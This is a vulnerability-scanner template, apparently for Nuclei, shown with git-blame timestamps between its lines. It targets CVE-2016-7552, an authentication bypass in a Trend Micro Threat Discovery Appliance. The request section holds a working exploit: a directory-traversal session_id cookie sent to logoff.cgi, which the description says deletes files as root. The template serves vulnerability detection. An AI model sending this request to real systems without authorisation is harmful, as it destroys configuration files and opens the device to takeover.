2021-02-23 21:19:32 +00:00
id : CVE-2016-7552
info :
2022-05-10 16:23:52 +00:00
name : Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass
2021-02-23 21:19:32 +00:00
author : dwisiswant0
severity : critical
2022-05-10 16:23:52 +00:00
description : "Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS."
2022-04-22 10:38:41 +00:00
reference :
- https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
2022-05-10 16:23:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2016-7552
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2016-7552
cwe-id : CWE-22
2022-04-22 10:38:41 +00:00
tags : cve,cve2016,lfi,auth,bypass
2021-02-23 21:19:32 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/cgi-bin/logoff.cgi"
headers :
Cookie : "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
2021-03-10 08:52:33 +00:00
- "Memory map"
part : body
2022-05-10 16:23:52 +00:00
# Enhanced by mp on 2022/05/10